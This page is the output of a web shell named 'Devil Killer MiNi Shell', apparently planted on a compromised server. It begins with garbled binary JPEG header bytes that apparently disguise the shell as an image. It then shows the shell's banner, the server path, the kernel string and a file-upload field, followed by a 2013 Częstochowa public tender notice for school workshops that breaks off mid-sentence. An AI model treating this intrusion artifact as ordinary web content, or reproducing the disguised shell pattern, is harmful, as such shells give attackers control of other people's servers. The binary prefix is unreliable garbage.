JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130315/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130315/104228-N-2013.html

<p class="kh_header"><b>Częstochowa: Przeprowadzenie dodatkowych  zajęć warsztatowych pozalekcyjnych w ramach kompetencji kluczowych oraz dodatkowych zajęć specjalistycznych dla uczniów i uczennic V klas 23 Szkół Podstawowych (w tym 2 Szkół Podstawowych Specjalnych) dla których organem prowadzącym jest Gmina Miasto Częstochowa</b><br>
<b>Numer ogłoszenia: 104228 - 2013; data zamieszczenia: 15.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Częstochowa , ul. Śląska 11/13, 42-217 Częstochowa, woj. śląskie, tel. 34 3707100, faks 34 3707170.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czestochowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie dodatkowych  zajęć warsztatowych pozalekcyjnych w ramach kompetencji kluczowych oraz dodatkowych zajęć specjalistycznych dla uczniów i uczennic V klas 23 Szkół Podstawowych (w tym 2 Szkół Podstawowych Specjalnych) dla których organem prowadzącym jest Gmina Miasto Częstochowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przeprowadzenie dodatkowych  zajęć warsztatowych pozalekcyjnych w ramach kompetencji kluczowych oraz dodatkowych zajęć specjalistycznych dla uczniów i uczennic V klas 23 Szkół Podstawowych (w tym 2 Szkół Podstawowych Specjalnych) dla których organem prowadzącym jest Gmina Miasto Częstochowa  na potrzeby projektu Koniec języka za przewodnika Program Operacyjny Kapitał Ludzki, Priorytet IX Rozwój Wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych. Zamówienie podzielone jest na 87 części:
CZĘŚĆ nr 1: Prowadzenie warsztatu matematyczno-przyrodniczego z elementami informatyki w SP nr 1 im. Zdobywców Przestworzy dla uczniów klas V
Produkt pracy grupy: stworzenie strony internetowej, projektu graficznego.
CZĘŚĆ nr 2: Prowadzenie warsztatu artystyczno-teatralno-filmowego w SP nr 1 im. Zdobywców Przestworzy dla uczniów klas V
Produkt pracy grupy: stworzenie wytworu artystycznego.
CZĘŚĆ nr 3: Prowadzenie warsztatu matematyczno-przyrodniczego z elementami informatyki w SP nr 2 im. K. K. Baczyńskiego dla uczniów klas V
Produkt pracy grupy: stworzenie strony internetowej; projektu graficznego.
CZĘŚĆ nr 4:  Prowadzenie warsztatu  humanistycznego z akcentem na regionalizm  w SP nr 2 im. K. K. Baczyńskiego dla uczniów klas V
Produkt pracy grupy: Kółko zainteresowań zakończone wystawą.
CZĘŚĆ nr 5:  Prowadzenie warsztatu artystyczno-muzycznego w SP nr 2 im. K.K. Baczyńskiego dla uczniów klas V
Produkt pracy grupy: przedstawienie muzyczne.
CZĘŚĆ nr 6: Prowadzenie warsztatu  artystyczno-plastycznego  w SP nr 2 im. K.K. Baczyńskiego dla uczniów klas V
Produkt pracy grupy: stworzenie wytworu plastycznego.
CZĘŚĆ nr 7: Prowadzenie warsztatu matematyczno-przyrodniczego 
z elementami informatyki w SP nr 8 im. H. Poświatowskiej dla uczniów klas V
Produkt pracy grupy: stworzenie strony internetowej; projektu graficznego.
CZĘŚĆ nr 8:  Prowadzenie warsztatu  humanistycznego z akcentem na regionalizm  w SP nr 8 im. H. Poświatowskiej dla uczniów klas V
Produkt pracy grupy: kółko zainteresowań zakończone wystawą.
CZĘŚĆ nr 9:  Prowadzenie warsztatu  artystyczno-muzycznego SP nr 8 im. H. Poświatowskiej dla uczniów klas V
Produkt pracy grupy: przedstawienie muzyczne.
CZĘŚĆ nr 10: Prowadzenie warsztatu  artystyczno-plastycznego SP nr 8 im. H. Poświatowskiej dla uczniów klas V
Produkt pracy grupy: stworzenie wytworu plastycznego.
CZĘŚĆ nr 11: Prowadzenie warsztatu artystyczno-teatralno-filmowego w SP nr 8 im. H. Poświatowskiej dla uczniów klas V
Produkt pracy grupy:  stworzenie wytworu artystycznego.
CZĘŚĆ nr 12: Prowadzenie warsztatu matematyczno-przyrodniczego z elementami informatyki w SP nr 13 im. K. Makuszyńskiego dla uczniów klas V
Produkt pracy grupy: stworzenie strony internetowej, projektu graficznego.
CZĘŚĆ nr 13: Prowadzenie warsztatu  humanistycznego z akcentem na regionalizm w SP nr 13 im. K. Makuszyńskiego dla uczniów klas V
Produkt pracy grupy: kółko zainteresowań zakończone wystawą.
CZĘŚĆ nr 14: Prowadzenie warsztatu artystyczno-muzycznego w SP nr 13 im. K. Makuszyńskiego dla uczniów klas V
Produkt pracy grupy: przedstawienie muzyczne.
CZĘŚĆ nr 15:  Prowadzenie warsztatu artystyczno-plastycznego w SP nr 13 im. K. Makuszyńskiego dla uczniów klas V
Produkt pracy grupy: stworzenie wytworu plastycznego.
CZĘŚĆ nr 16: Prowadzenie warsztatu artystyczno-teatralno-filmowego w SP nr 13 im. K. Makuszyńskiego dla uczniów klas V
Produkt pracy grupy:  stworzenie wytworu artystycznego.
CZĘŚĆ nr 17: Prowadzenie warsztatu humanistycznego z akcentem na regionalizm w SP nr 15 w Zespole Szkół nr 2 im. Polskich Noblistów
Produkt pracy grupy: kółko zainteresowań zakończone wystawą.
CZĘŚĆ nr 18: Prowadzenie warsztatu artystyczno-plastycznego  w SP nr 15 w Zespole Szkół nr 2 im. Polskich Noblistów
Produkt pracy grupy: stworzenie wytworu plastycznego.
CZĘŚĆ nr 19: Prowadzenie warsztatu matematyczno-przyrodniczego 
z elementami informatyki  w SP nr 19 w Zespole Szkół nr 15  dla uczniów klas V
Produkt pracy grupy: stworzenie strony internetowej, projektu graficznego.
CZĘŚĆ nr 20: Prowadzenie warsztatu artystyczno-muzycznego w SP nr 19 w Zespole Szkół nr 15  dla uczniów klas V
Produkt pracy grupy: przedstawienie muzyczne.
CZĘŚĆ nr 21: Prowadzenie warsztatu artystyczno-plastycznego w SP nr 19 w Zespole Szkół nr 15  dla uczniów klas V
Produkt pracy grupy: stworzenie wytworu plastycznego.
CZĘŚĆ nr 22: Prowadzenie warsztatu matematyczno-przyrodniczego 
z elementami informatyki  w SP nr 27 w Zespole Szkół nr 3  dla uczniów klas V
Produkt pracy grupy: stworzenie strony internetowej, projektu graficznego.
CZĘŚĆ nr 23: Prowadzenie warsztatu artystyczno-muzycznego w SP nr 27 w Zespole Szkół nr 3  dla uczniów klas V
Produkt pracy grupy: przedstawienie muzyczne.
CZĘŚĆ nr 24: Prowadzenie warsztatu artystyczno-plastycznego w SP nr 27 w Zespole Szkół nr 3  dla uczniów klas V
Produkt pracy grupy: stworzenie wytworu plastycznego.
CZĘŚĆ nr 25: Prowadzenie warsztatu artystyczno-teatralno-filmowego w SP nr 27 w Zespole Szkół nr 3  dla uczniów klas V
Produkt pracy grupy:  stworzenie wytworu artystycznego.
CZĘŚĆ nr 26: Prowadzenie warsztatu matematyczno-przyrodniczego 
z elementami informatyki  w SP nr 30 im. Por. M. Brzeskiego  dla uczniów klas V
Produkt pracy grupy: stworzenie strony internetowej; projektu graficznego.
CZĘŚĆ nr 27: Prowadzenie warsztatu humanistycznego z akcentem na regionalizm w SP nr 30 im. Por. M. Brzeskiego  dla uczniów klas V
Produkt pracy grupy: kółko zainteresowań zakończone wystawą.
CZĘŚĆ nr 28: Prowadzenie warsztatu artystyczno-muzycznego w SP nr 30 im. Por. M. Brzeskiego  dla uczniów klas V
Produkt pracy grupy: przedstawienie artystyczne.
CZĘŚĆ nr 29: Prowadzenie warsztatu artystyczno-plastycznego w SP nr 30 im. Por. M. Brzeskiego  dla uczniów klas V
Produkt pracy grupy: stworzenie wytworu plastycznego.
CZĘŚĆ nr 30: Prowadzenie warsztatu matematyczno-przyrodniczego 
z elementami informatyki w SP nr 32 im.  Jerzego Dudy-Gracza dla uczniów klas V 
Produkt pracy grupy: stworzenie strony internetowej; projektu graficznego.
CZĘŚĆ nr 31: Prowadzenie warsztatu humanistycznego z akcentem na regionalizm w SP nr 32 im.  Jerzego Dudy-Gracza dla uczniów klas V 
Produkt pracy grupy: kółko zainteresowań zakończone wystawą.
CZĘŚĆ nr 32: Prowadzenie warsztatu artystyczno-muzycznego w SP nr 32 im.  Jerzego Dudy-Gracza dla uczniów klas V 
Produkt pracy grupy: przedstawienie muzyczne.
CZĘŚĆ nr 33: Prowadzenie warsztatu artystyczno-plastycznego w SP nr 32 im.  Jerzego Dudy-Gracza dla uczniów klas V 
Produkt pracy grupy: stworzenie wytworu plastycznego.
CZĘŚĆ nr 34: Prowadzenie warsztatu artystyczno-teatralno-filmowego w SP nr 32 im.  Jerzego Dudy-Gracza dla uczniów klas V 
Produkt pracy grupy:  stworzenie wytworu artystycznego.
CZĘŚĆ nr 35: Prowadzenie warsztatu matematyczno-przyrodniczego 
z elementami informatyki w SP nr 34 im.  Aleksandra Hrabiego Fredry  dla uczniów klas V
Produkt pracy grupy: stworzenie strony internetowej, projektu graficznego.
CZĘŚĆ nr 36: Prowadzenie warsztatu humanistycznego z akcentem na regionalizm w SP nr 34 im.  Aleksandra Hrabiego Fredry  dla uczniów klas V
Produkt pracy grupy: kółko zainteresowań zakończone wystawą.
CZĘŚĆ nr 37: Prowadzenie warsztatu artystyczno-muzycznego w SP nr 34 im.  Aleksandra Hrabiego Fredry  dla uczniów klas V
 Produkt pracy grupy: przedstawienie artystyczne.
CZĘŚĆ nr 38: Prowadzenie warsztatu artystyczno-plastycznego w SP nr 34 im.  Aleksandra Hrabiego Fredry  dla uczniów klas V
Produkt pracy grupy: stworzenie wytworu plastycznego.
CZĘŚĆ nr 39: Prowadzenie warsztatu artystyczno-teatralno-filmowego w SP nr 34 im.  Aleksandra Hrabiego Fredry  dla uczniów klas V
Produkt pracy grupy: stworzenie wytworu artystycznego.
CZĘŚĆ nr 40:  Prowadzenie warsztatu matematyczno-przyrodniczego 
z elementami informatyki w SP nr 36 dla uczniów klas V
Produkt pracy grupy: stworzenie strony internetowej; projektu graficznego.
CZĘŚĆ nr 41: Prowadzenie warsztatu humanistycznego z akcentem na regionalizm w SP nr 36 dla uczniów klas V
Produkt pracy grupy: kółko zainteresowań zakończone wystawą.
CZĘŚĆ nr 42: Prowadzenie warsztatu artystyczno-muzycznego w SP nr 36 dla uczniów klas V
Produkt pracy grupy: przedstawienie muzyczne.
CZĘŚĆ nr 43: Prowadzenie warsztatu artystyczno-plastycznego w SP nr 36 dla uczniów klas V
Produkt pracy grupy: stworzenie wytworu plastycznego.
CZĘŚĆ nr 44: Prowadzenie warsztatu artystyczno-tetralno-filmowego w SP nr 36 dla uczniów klas V
Produkt pracy grupy:  stworzenie wytworu artystycznego.
CZĘŚĆ nr 45:  Prowadzenie warsztatu matematyczno-przyrodniczego 
z elementami informatyki w SP nr 38 im. L. Zamenhofa dla uczniów klas V
Produkt pracy grupy: stworzenie strony internetowej; projektu graficznego.
CZĘŚĆ nr 46: Prowadzenie  warsztatu artystyczno-muzycznego w SP nr 38 im. L. Zamenhofa dla uczniów klas V 
Produkt pracy grupy: przedstawienie muzyczne.
CZĘŚĆ nr 47: Prowadzenie  warsztatu artystyczno-teatralno-filmowego w SP nr 38 im. L. Zamenhofa dla uczniów klas V  
Produkt pracy grupy:  stworzenie wytworu artystycznego.
CZĘŚĆ nr 48: Prowadzenie warsztatu matematyczno-przyrodniczego 
z elementami informatyki w SP nr 42 im. J. Brzechwy dla uczniów klas V
Produkt pracy grupy: stworzenie strony internetowej; projektu graficznego.
CZĘŚĆ nr 49: Prowadzenie warsztatu humanistycznego z akcentem na regionalizm w SP nr 42 im. J. Brzechwy dla uczniów klas V
Produkt pracy grupy: kółko zainteresowań zakończone wystawą.
CZĘŚĆ nr 50: Prowadzenie warsztatu artystyczno-teatralno-filmowego w SP nr 42 im. J. Brzechwy dla uczniów klas V
Produkt pracy grupy:  stworzenie wytworu artystycznego.
CZĘŚĆ nr 51: Prowadzenie warsztatu matematyczno-przyrodniczego 
z elementami informatyki w SP nr 47 im. M. Konopnickiej dla uczniów klas V
Produkt pracy grupy: stworzenie strony internetowej; projektu graficznego.
CZĘŚĆ nr 52: Prowadzenie warsztatu humanistycznego z akcentem na regionalizm w SP nr 47 im. M. Konopnickiej dla uczniów klas V 
Produkt pracy grupy: kółko zainteresowań zakończone wystawą.
CZĘŚĆ nr 53: Prowadzenie warsztatu artystyczno-muzycznego w SP nr 47 im. M. Konopnickiej dla uczniów klas V 
Produkt pracy grupy: przedstawienie muzyczne.
CZĘŚĆ nr 54: Prowadzenie warsztatu artystyczno-plastycznego w SP nr 47 im. M. Konopnickiej dla uczniów klas V 
Produkt pracy grupy: stworzenie wytworu plastycznego.
CZĘŚĆ nr 55: Prowadzenie warsztatu artystyczno-teatralno-filmowego w SP nr 47 im. M. Konopnickiej dla uczniów klas V 
Produkt pracy grupy:  stworzenie wytworu artystycznego.
CZĘŚĆ nr 56: Prowadzenie warsztatu matematyczno-przyrodniczego 
z elementami informatyki w SP nr 48 z Oddziałami Integracyjnymi 
im. gen. Z. Berlinga dla uczniów klas V
Produkt pracy grupy: stworzenie strony internetowej, projektu graficznego.
CZĘŚĆ nr 57: Prowadzenie warsztatu humanistycznego z akcentem na regionalizm w SP nr 48 z Oddziałami Integracyjnymi 
im. gen. Z. Berlinga dla uczniów klas V
Produkt pracy grupy: kółko zainteresowań zakończone wystawą.
CZĘŚĆ nr 58: Prowadzenie warsztatu artystyczno-muzycznego  w SP nr 48 
z Oddziałami Integracyjnymi im. gen. Z. Berlinga dla uczniów klas V
Produkt pracy grupy: przedstawienie muzyczne.
CZĘŚĆ nr 59: Prowadzenie warsztatu artystyczno-plastycznego  w SP nr 48 
z Oddziałami Integracyjnymi im. gen. Z. Berlinga dla uczniów klas V
Produkt pracy grupy: stworzenie wytworu plastycznego.
CZĘŚĆ nr 60: Prowadzenie warsztatu artystyczno-teatralno-filmowego  w SP nr 48 z Oddziałami Integracyjnymi im. gen. Z. Berlinga dla uczniów klas V
Produkt pracy grupy:  stworzenie wytworu artystycznego.
CZĘŚĆ nr 61: Prowadzenie warsztatu matematyczno-przyrodniczego 
z elementami informatyki w SP nr 49  im. J. Kusocińskiego dla uczniów klas V
Produkt pracy grupy: stworzenie strony internetowej, projektu graficznego.
CZĘŚĆ nr 62: Prowadzenie warsztatu humanistycznego z akcentem na regionalizm w  SP nr 49  im. J. Kusocińskiego dla uczniów klas V
Produkt pracy grupy: kółko zainteresowań zakończone wystawą.
CZĘŚĆ nr 63: Prowadzenie warsztatu artystyczno-muzycznego w  SP nr 49  
im. J. Kusocińskiego dla uczniów klas V
Produkt pracy grupy: przedstawienie muzyczne.
CZĘŚĆ nr 64: Prowadzenie warsztatu artystyczno-plastycznego w  SP nr 49  
im. J. Kusocińskiego dla uczniów klas V
Produkt pracy grupy: stworzenie wytworu plastycznego.
CZĘŚĆ nr 65: Prowadzenie warsztatu artystyczno-teatralno-filmowego w  SP nr 49  im. J. Kusocińskiego dla uczniów klas V
Produkt pracy grupy:  stworzenie wytworu artystycznego.
CZĘŚĆ nr 66: Prowadzenie warsztatu matematyczno-przyrodniczego 
z elementami informatyki w SP nr 50  im. gen. W. Sikorskiego dla uczniów klas V
Produkt pracy grupy: stworzenie strony internetowej, projektu graficznego.
CZĘŚĆ nr 67: Prowadzenie warsztatu humanistycznego z akcentem na regionalizm w SP nr 50  im. gen. W. Sikorskiego dla uczniów klas V
Produkt pracy grupy: kółko zainteresowań zakończone wystawą.
CZĘŚĆ nr 68: Prowadzenie warsztatu artystyczno-muzycznego w SP nr 50  im. gen. W. Sikorskiego dla uczniów klas V
Produkt pracy grupy: przedstawienie muzyczne.
CZĘŚĆ nr 69: Prowadzenie warsztatu artystyczno-plastycznego w SP nr 50  im. gen. W. Sikorskiego dla uczniów klas V
Produkt pracy grupy: stworzenie wytworu plastycznego.

CZĘŚĆ nr 70: Prowadzenie warsztatu artystyczno-teatralno-filmowego w SP nr 50  im. gen. W. Sikorskiego dla uczniów klas V
Przewidywana liczba osób prowadzących zajęcia: 1 osoba;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi łącznie 45 h;
Przewidywalna liczba grup: 1;
Przewidywana liczba uczestników zajęć wynosi łącznie 10 osób.
Produkt pracy grupy:  stworzenie wytworu artystycznego.


CZĘŚĆ nr 71: Prowadzenie warsztatu humanistycznego z akcentem na regionalizm w SP nr 51 w Zespole Szkolno-Przedszkolnym nr 4 
im. M. Skłodowskiej-Curie dla uczniów klas V
Przewidywana liczba osób prowadzących zajęcia: 1 osoba;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi łącznie 90 h;
Przewidywalna liczba grup: 1;
Przewidywana liczba uczestników zajęć wynosi łącznie 12 osób.
Produkt pracy grupy:  kółko zainteresowań zakończone wystawą.

CZĘŚĆ nr 72: Prowadzenie warsztatu artystyczno-muzycznego w SP nr 51 w Zespole Szkolno-Przedszkolnym nr 4 im. M. Skłodowskiej-Curie dla uczniów klas V
Przewidywana liczba osób prowadzących zajęcia: 1 osoba;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi łącznie 45 h;
Przewidywalna liczba grup: 1;
Przewidywana liczba uczestników zajęć wynosi łącznie 10 osób.
Produkt pracy grupy: przedstawienie artystyczne

CZĘŚĆ nr 73: Prowadzenie warsztatu artystyczno-plastycznego w SP nr 51 
w Zespole Szkolno-Przedszkolnym nr 4 im. M. Skłodowskiej-Curie dla uczniów klas V
Przewidywana liczba osób prowadzących zajęcia: 1 osoba;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi łącznie 45 h;
Przewidywalna liczba grup: 1;
Przewidywana liczba uczestników zajęć wynosi łącznie 10 osób.
Produkt pracy grupy: stworzenie wytworu plastycznego.

CZĘŚĆ nr 74: Prowadzenie warsztatu artystyczno-teatralno-filmowego w SP nr 51 w Zespole Szkolno-Przedszkolnym nr 4 im. M. Skłodowskiej-Curie dla uczniów klas V
Przewidywana liczba osób prowadzących zajęcia: 1 osoba;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi łącznie 45 h;
Przewidywalna liczba grup: 1;
Przewidywana liczba uczestników zajęć wynosi łącznie 12 osób.
Produkt pracy grupy:  stworzenie wytworu artystycznego.

CZĘŚĆ nr 75: Prowadzenie warsztatu matematyczno-przyrodniczego 
z elementami informatyki w SP nr 52  im. Małego Powstańca dla uczniów klas V
Przewidywana liczba osób prowadzących zajęcia: min. 2 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi łącznie 90 h;
Przewidywalna liczba grup: 1;
Przewidywana liczba uczestników zajęć wynosi łącznie 11 osób.
Produkt pracy grupy: stworzenie strony internetowej; projektu graficznego.
CZĘŚĆ nr 76: Prowadzenie warsztatu matematyczno-przyrodniczego 
z elementami informatyki w SP nr 53 z Oddziałami Integracyjnymi  im. M. Skłodowskiej-Curie dla uczniów klas V
Produkt pracy grupy: stworzenie strony internetowej; projektu graficznego
CZĘŚĆ nr 77: Prowadzenie warsztatu artystyczno-plastycznego w SP nr 53 z Oddziałami Integracyjnymi  im. M. Skłodowskiej-Curie dla uczniów klas V
Produkt pracy grupy: stworzenie wytworu plastycznego.
CZĘŚĆ nr 78: Prowadzenie warsztatu artystyczno-teatralno-filmowego w SP nr 53 z Oddziałami Integracyjnymi  im. M. Skłodowskiej-Curie dla uczniów klas V
Produkt pracy grupy:  stworzenie wytworu artystycznego.
CZĘŚĆ nr 79: Prowadzenie warsztatu matematyczno-przyrodniczego 
z elementami informatyki w SP nr 54 w Zespole Szkół nr 1 z Oddziałami Integracyjnymi  im. Powstania Warszawskiego dla uczniów klas V
Produkt pracy grupy: stworzenie strony internetowej, projektu graficznego.
CZĘŚĆ nr 80: Prowadzenie terapii integracji sensorycznej w Specjalnym Ośrodku Szkolno-Wychowawczym nr 1 dla uczniów klas V
Przewidywana liczba osób prowadzących zajęcia: min. 2 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi łącznie 120 h;
Przewidywalna liczba grup: 1;
Przewidywana liczba uczestników zajęć wynosi łącznie 5 osób.
CZĘŚĆ nr 81: Prowadzenie kinezjologii edukacyjnej w Specjalnym Ośrodku Szkolno-Wychowawczym nr 1 dla uczniów klas V
Przewidywana liczba osób prowadzących zajęcia: min. 2 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi łącznie 120 h;
Przewidywalna liczba grup: 1;
Przewidywana liczba uczestników zajęć wynosi łącznie 5 osób.
CZĘŚĆ nr 82: Prowadzenie poradnictwa psychologiczno-pedagogicznego 
w Specjalnym Ośrodku Szkolno-Wychowawczym nr 1 dla uczniów klas V
Przewidywana liczba osób prowadzących zajęcia: min. 2 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi łącznie 120 h;
Przewidywalna liczba grup: 1;
Przewidywana liczba uczestników zajęć wynosi łącznie 5 osób.
CZĘŚĆ nr 83: Prowadzenie warsztatu matematyczno-przyrodniczego 
z elementami informatyki w Zespole Szkół Specjalnych nr 28 dla uczniów klas V
Przewidywana liczba osób prowadzących zajęcia: min. 2 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi łącznie 120 h;
Przewidywalna liczba grup: 1;
Przewidywana liczba uczestników zajęć wynosi łącznie 5 osób.
CZĘŚĆ nr 84: Prowadzenie warsztatu humanistycznego z akcentem na regionalizm w Zespole Szkół Specjalnych nr 28 dla uczniów klas V
Przewidywana liczba osób prowadzących zajęcia: min. 2 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi łącznie 120 h;
Przewidywalna liczba grup: 1;
Przewidywana liczba uczestników zajęć wynosi łącznie 5 osób.
CZĘŚĆ nr 85: Prowadzenie warsztatu terapii integracji sensorycznej w Zespole Szkół Specjalnych nr 28 dla uczniów klas V
Przewidywana liczba osób prowadzących zajęcia: min. 2 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi łącznie 120 h;
Przewidywalna liczba grup: 1;
Przewidywana liczba uczestników zajęć wynosi łącznie 5 osób.
CZĘŚĆ nr 86: Prowadzenie terapii metodą Tomatisa w Zespole Szkół Specjalnych nr 28 dla uczniów klas V
Przewidywana liczba osób prowadzących zajęcia: min. 2 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi łącznie 120 h;
Przewidywalna liczba grup: 1;
Przewidywana liczba uczestników zajęć wynosi łącznie 4 osób.
CZĘŚĆ nr 87: Prowadzenie zajęć alternatywne metody komunikacji w Zespole Szkół Specjalnych nr 28 dla uczniów klas V
Przewidywana liczba osób prowadzących zajęcia: min. 2 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi łącznie 120 h;
Przewidywalna liczba grup: 1;
Przewidywana liczba uczestników zajęć wynosi łącznie 5 osób.
2. Zajęcia prowadzone będą od poniedziałku do piątku w pomieszczeniach udostępnionych przez dyrektorów szkół. W dni nauki zajęcia będą mogły odbywać się 
